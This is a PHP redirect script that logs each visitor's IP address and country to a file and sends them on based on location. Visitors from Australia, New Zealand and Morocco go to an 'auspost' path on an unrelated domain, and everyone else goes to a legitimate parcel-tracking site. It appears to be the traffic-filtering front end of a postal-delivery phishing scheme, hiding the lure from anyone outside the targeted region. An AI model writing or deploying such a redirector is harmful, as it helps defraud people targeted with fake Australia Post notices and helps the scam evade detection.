<?php
// Enable error reporting (remove in production)
error_reporting(E_ALL);
ini_set('display_errors', 1);

// Function to get the real user IP
function getUserIP() {
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        return $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $ip_list = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        return trim($ip_list[0]); // First IP in the list is the real one
    } else {
        return $_SERVER['REMOTE_ADDR'];
    }
}

// Get the user's IP
$user_ip = getUserIP();

// Function to get country via IP using cURL
function getCountryByIP($ip) {
    $api_url = "http://ip-api.com/json/$ip";
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $api_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); // Timeout in seconds
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    $response = curl_exec($ch);
    curl_close($ch);

    if ($response) {
        $data = json_decode($response, true);
        return isset($data['country']) ? $data['country'] : 'Unknown';
    }
    
    return "Unknown"; // Return "Unknown" if API fails
}

// Get country based on IP
$country = getCountryByIP($user_ip);

// Log the visit
$log_entry = date("Y-m-d H:i:s") . " - IP: $user_ip - Country: $country\n";
file_put_contents("visit.txt", $log_entry, FILE_APPEND | LOCK_EX);

// Redirect users based on country
$allowed_countries = ["Morocco", "Australia", "New Zealand"];
if (in_array($country, $allowed_countries)) {
    header("Location: https://e-cex.com/auspost");
} else {
    header("Location: https://www.17track.net/en");
}
exit();
?>
